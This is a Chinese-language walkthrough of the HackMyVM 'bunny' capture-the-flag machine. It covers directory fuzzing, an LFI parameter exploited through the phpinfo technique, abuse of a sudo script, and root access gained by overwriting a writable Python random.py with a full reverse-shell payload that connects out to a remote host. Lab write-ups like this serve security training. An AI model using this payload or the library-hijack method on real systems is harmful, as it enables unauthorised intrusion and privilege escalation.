hackmyvm-buny walkthrough

難度(作者評價)：difficult

信息收集

PORT STATE SERVICE 22/tcp open ssh 80/tcp open http

獲取shell

端口信息很少，常規操作，訪問80，爆破目錄。


upload.php，password.txt，config.php都是沒有實際含義的文本文件。phpinfo.php泄露了主機的相關信息。

能想到的就是index.php是不是存在ssrf。于是利用ffuf對index.php進行參數fuzz，得到參數page為實際請求參數。

由于allow_url_include是off，所以沒有辦法進行php://input和data協議利用。 爆破日志文件也不能被利用來進行本地文件包含獲取shell。

同時web服務中沒有上傳點，于是參考文章php文件包含漏洞（利用phpinfo）復現^[1]，成功上傳shell。

切換用戶

為了操作方便獲取pty，反彈一個shell，查看sudo。

magic文件如下：

#/bin/bash $1 $2 $3 -T -TT 'sh #'

很簡單切換到用戶chris，得到第一個flag。

提權至root

利用pspy64可以看到root每分鐘在運行pendu.py。
該文件沒做什么事情，但是引入了random。


從圖中可以看到random是可以修改的。于是將random改成一個反彈shell。

chris@bunny:~$ cat /usr/lib/python3.7/random.py cat /usr/lib/python3.7/random.py import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("*.*.*.*",5555)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"])

成功獲取root權限。

參考

https://www.cnblogs.com/xiaoqiyue/p/10158702.html

總結

以上是生活随笔為你收集整理的hackmyvm-bunny walkthrough的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。